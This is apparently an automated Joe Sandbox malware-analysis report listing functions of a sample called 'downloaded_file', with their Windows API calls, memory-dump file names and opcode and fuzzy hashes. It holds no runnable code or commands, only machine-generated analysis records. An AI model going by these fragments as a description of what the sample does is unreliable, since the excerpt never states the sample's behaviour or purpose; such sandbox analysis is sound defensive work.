                                                                                                            • Opcode ID: ed8bd0ab92faa1f54095003defd2a49c59da4fdb40cb08683ccfb0fcb8a2e0cc
                                                                                                            • Instruction ID: 5bf9fecc4e944cdda30421228a4ebd8640b3b06c722538c1d93f0db11f68cdef
                                                                                                            • Opcode Fuzzy Hash: ed8bd0ab92faa1f54095003defd2a49c59da4fdb40cb08683ccfb0fcb8a2e0cc
                                                                                                            • Instruction Fuzzy Hash: 39E0D834118124CFC712EB68E08A77837D5FF44308F1A00A1E80CCB223CB34EC519583
                                                                                                            Function 00309C90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryW.KERNEL32(USER32.DLL,?,?,00301089), ref: 00309C9B
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 00309CB3
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00309CCC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                            • String ID: SetProcessDPIAware$USER32.DLL
                                                                                                            • API String ID: 145871493-772676101
                                                                                                            • Opcode ID: 5f2da0d06ea70b5efa4b2da3df3038f1061bad8ef0a21b996d6672bb163bfff2
                                                                                                            • Instruction ID: 04a4e171deb233a495ee1fa142fdc494a09fe5d751b11d8779874b597e6552ee
                                                                                                            • Opcode Fuzzy Hash: 5f2da0d06ea70b5efa4b2da3df3038f1061bad8ef0a21b996d6672bb163bfff2
                                                                                                            • Instruction Fuzzy Hash: 3AE0C974D01208EFDB06EFE4D98D6DEBBB8AB08701F108495E905A2290D6754B88CB51
                                                                                                            Function 00316D6B Relevance: 7.6, APIs: 5, Instructions: 85threadsynchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316DC7
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316DF9
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00316E17
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000E020,-00379F18,00000004,00000000), ref: 00316E4C
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 00316E8C
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00316EF9
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316F31
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316F63
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00316F81
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000E020,-00379F18,00000004,00000000), ref: 00316FB5
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 00316FF5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleThread$EventResume$ObjectSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 738346648-0
                                                                                                            • Opcode ID: 9d8c0ec5c7d6687e370ca2418896bee5627bb809b03409f9be8e92b2c338664e
                                                                                                            • Instruction ID: 9580e0dd882b1a3fc3cc291f58ce722458076ac38e3c5fd0bcef8a536ffd546c
                                                                                                            • Opcode Fuzzy Hash: 9d8c0ec5c7d6687e370ca2418896bee5627bb809b03409f9be8e92b2c338664e
                                                                                                            • Instruction Fuzzy Hash: 22413271A001058FCF1DCF54C999BBEB7B6FB98305F154669E11AAF2D5C7309881CB60
                                                                                                            Function 00320870 Relevance: 7.6, APIs: 5, Instructions: 69networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WSACreateEvent.WS2_32 ref: 00320876
                                                                                                            • WSAEventSelect.WS2_32(?,00000000,00000002), ref: 00320893
                                                                                                            • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 003208D3
                                                                                                            • WSACloseEvent.WS2_32(00000000), ref: 003208E0
                                                                                                            • WSACloseEvent.WS2_32(00000000), ref: 00320939
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Event$Close$CreateEventsMultipleSelectWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2166016019-0
                                                                                                            • Opcode ID: c1254236e277558fe6fdc602535a63ec3c2fffccbfdd5829247d061b19f1aeaf
                                                                                                            • Instruction ID: 35eabbd71c786c50fe52bbd3e0c6a32364870bf51f309bda22a0846a7e30a1c4
                                                                                                            • Opcode Fuzzy Hash: c1254236e277558fe6fdc602535a63ec3c2fffccbfdd5829247d061b19f1aeaf
                                                                                                            • Instruction Fuzzy Hash: 8A215EB4900219EFDF19CFA4E948BAE77B9BF05310F104158E40667292C7B59E85DF61
                                                                                                            Function 00320790 Relevance: 7.6, APIs: 5, Instructions: 69networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WSACreateEvent.WS2_32 ref: 00320796
                                                                                                            • WSAEventSelect.WS2_32(?,00000000,00000001), ref: 003207B3
                                                                                                            • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 003207F3
                                                                                                            • WSACloseEvent.WS2_32(00000000), ref: 00320800
                                                                                                            • WSACloseEvent.WS2_32(00000000), ref: 00320859
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Event$Close$CreateEventsMultipleSelectWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2166016019-0
                                                                                                            • Opcode ID: 16e98285ce4d8f0c0bcc72a5290b42aa6f9bebbb9f5634049951e61fa8180511
                                                                                                            • Instruction ID: 3246016a525fdbdbbd3f0a2b37dfa5b904db6b84cbbf32c9382aeb66b49cddc7
                                                                                                            • Opcode Fuzzy Hash: 16e98285ce4d8f0c0bcc72a5290b42aa6f9bebbb9f5634049951e61fa8180511
                                                                                                            • Instruction Fuzzy Hash: AA2139B4900219EFDF19CF94E948BAF77B8BF05300F218558E80567282C7B59E84DBA1
                                                                                                            Function 0032E464 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 0032E472
                                                                                                              • Part of subcall function 00324619: __FF_MSGBANNER.LIBCMT ref: 00324632
                                                                                                              • Part of subcall function 00324619: __NMSG_WRITE.LIBCMT ref: 00324639
                                                                                                              • Part of subcall function 00324619: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00305B93,?), ref: 0032465E
                                                                                                            • _free.LIBCMT ref: 0032E485
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1020059152-0
                                                                                                            • Opcode ID: 68891e5b60b3d1f81a6e5c3953027f78dbc95bf7c65fd6360c96e1ae4c6eafc0
                                                                                                            • Instruction ID: f4e8a11a06f080cecfc961dd1f51a857f7bbd6a02e61d0b8273fce4e6eb10fc8
                                                                                                            • Opcode Fuzzy Hash: 68891e5b60b3d1f81a6e5c3953027f78dbc95bf7c65fd6360c96e1ae4c6eafc0
                                                                                                            • Instruction Fuzzy Hash: A9117332505635EBCB373BB6BC0A65A3B99AF413A0F368925F94D9A160DE3488808794
                                                                                                            Function 00322840 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000018), ref: 0032284A
                                                                                                              • Part of subcall function 0030FE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 0030FE74
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(?), ref: 0030FE86
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00371110), ref: 0030FE99
                                                                                                              • Part of subcall function 0030FE20: LocalAlloc.KERNEL32(00000040,?), ref: 0030FEB2
                                                                                                              • Part of subcall function 0030FE20: __snwprintf.LIBCMT ref: 0030FEDA
                                                                                                              • Part of subcall function 0030FE20: lstrlenW.KERNEL32(00000000), ref: 0030FEE6
                                                                                                              • Part of subcall function 0030FE20: CoTaskMemFree.COMBASE(?), ref: 0030FEF5
                                                                                                            • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0032287D
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003228B8
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003228C7
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003228D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$lstrlen$Alloc$AttributesFileFolderKnownPathTask__snwprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1368272246-0
                                                                                                            • Opcode ID: 1aa792c1c1280e31874969cdbb46f79d5d40271d3e7a6a191c82d383fa8eb579
                                                                                                            • Instruction ID: 1398f25f2d4c62c92dc5315a0fff6b1b9ef08b1a1507135e1561ea8a55ffb2c3
                                                                                                            • Opcode Fuzzy Hash: 1aa792c1c1280e31874969cdbb46f79d5d40271d3e7a6a191c82d383fa8eb579
                                                                                                            • Instruction Fuzzy Hash: 6E21D679D00208EFCB19DFA8D989A9EBBB5AF48300F108599E905A7350D734AA40DF60
                                                                                                            Function 003095E0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B,00316B10,00000000), ref: 003081EB
                                                                                                              • Part of subcall function 003081C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,00308D2B), ref: 00308205
                                                                                                              • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308235
                                                                                                              • Part of subcall function 003081C0: wnsprintfW.SHLWAPI ref: 00308251
                                                                                                              • Part of subcall function 003081C0: LocalFree.KERNEL32(00000000), ref: 00308A43
                                                                                                              • Part of subcall function 00301C60: _wcsrchr.LIBCMT ref: 00301C6C
                                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 00309630
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030963F
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00309649
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0030965A
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00309664
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Allocwnsprintf$AttributesFile_wcsrchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 3823319188-0
                                                                                                            • Opcode ID: dc6a96b43243ce4411002450097452798be7ec9615548caf3f543ef2d19e164b
                                                                                                            • Instruction ID: a100ad7f8a2bb04c437707266a88511b211d966f0837c4572bd35318db118949
                                                                                                            • Opcode Fuzzy Hash: dc6a96b43243ce4411002450097452798be7ec9615548caf3f543ef2d19e164b
                                                                                                            • Instruction Fuzzy Hash: EF112D79D10208EBCB25DFE4E959ADEBB7CEF48310F104599F909E7280D6359B84CB51
                                                                                                            Function 0031C8E0 Relevance: 7.5, APIs: 5, Instructions: 48synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(?), ref: 0031C915
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0031C924
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0031C931
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0031C93E
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031C958
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventFreeLocalObjectSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 3879024238-0
                                                                                                            • Opcode ID: ff71483dd8d4672ad641d5d3e950312bd583a0760f2fa4cb9219dba3d79351c5
                                                                                                            • Instruction ID: 220845a96ee8d8671777aa8cd405fd9465e65af86d6f9507e4752f43ac81e5fb
                                                                                                            • Opcode Fuzzy Hash: ff71483dd8d4672ad641d5d3e950312bd583a0760f2fa4cb9219dba3d79351c5
                                                                                                            • Instruction Fuzzy Hash: 0311BE79A10208EFCB09DF94D98899DBBB9FF4C711F208288E90967350D734AE85DF90
                                                                                                            Function 003132B0 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00313350: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00313364
                                                                                                              • Part of subcall function 00313350: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00313385
                                                                                                              • Part of subcall function 00313350: SHGetKnownFolderPath.SHELL32(00337C30,00000000,00000000,00000000), ref: 003133AC
                                                                                                              • Part of subcall function 00313350: lstrlenW.KERNEL32(00000000), ref: 003133BA
                                                                                                              • Part of subcall function 00313350: __snwprintf.LIBCMT ref: 003133E4
                                                                                                              • Part of subcall function 00313350: __snwprintf.LIBCMT ref: 003133FE
                                                                                                              • Part of subcall function 00313350: LocalFree.KERNEL32(00000000), ref: 0031340A
                                                                                                              • Part of subcall function 00313350: CoTaskMemFree.COMBASE(00000000), ref: 00313414
                                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 003132CF
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003132E2
                                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 00313312
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00313325
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$AllocAttributesFile__snwprintf$FolderKnownPathTasklstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1889006086-0
                                                                                                            • Opcode ID: a14c201d3f055471364a5a39d6bf72b45decfb9f0556a83ff35842be71c2c79a
                                                                                                            • Instruction ID: 9a95e9fe40120c936aa6b056edea6e06ff6ed284f961d00ed86eaca250a371ab
                                                                                                            • Opcode Fuzzy Hash: a14c201d3f055471364a5a39d6bf72b45decfb9f0556a83ff35842be71c2c79a
                                                                                                            • Instruction Fuzzy Hash: 67110079D10208EFDB25EFB4D9486DDBBB8EF48301F1088A8E515E7280D7758B80DB55
                                                                                                            Function 003041F0 Relevance: 7.5, APIs: 5, Instructions: 47threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0031BBFD), ref: 00304217
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0031BBFD), ref: 00304233
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00304320,00000000,00000000,00000000), ref: 00304256
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031BBFD), ref: 00304277
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031BBFD), ref: 0030428E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$CloseEventHandle$Thread
                                                                                                            • String ID:
                                                                                                            • API String ID: 3315681087-0
                                                                                                            • Opcode ID: 7ed1d42709f1cde1e6d1c7c6cf7bf3e41639e487744986e63d0f2a98e5985947
                                                                                                            • Instruction ID: 73ec9be29fa155eef7ae71269e821dd6189dd420022068b0233e9863007d0066
                                                                                                            • Opcode Fuzzy Hash: 7ed1d42709f1cde1e6d1c7c6cf7bf3e41639e487744986e63d0f2a98e5985947
                                                                                                            • Instruction Fuzzy Hash: 8F118374297300EFE7339B64ED9EB5A7ABCA704705F110829FA096A2F1CBB465D4CA04
                                                                                                            Function 003292DC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __getptd.LIBCMT ref: 003292E8
                                                                                                              • Part of subcall function 003281BE: __getptd_noexit.LIBCMT ref: 003281C1
                                                                                                              • Part of subcall function 003281BE: __amsg_exit.LIBCMT ref: 003281CE
                                                                                                            • __getptd.LIBCMT ref: 003292FF
                                                                                                            • __amsg_exit.LIBCMT ref: 0032930D
                                                                                                            • __lock.LIBCMT ref: 0032931D
                                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00329331
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
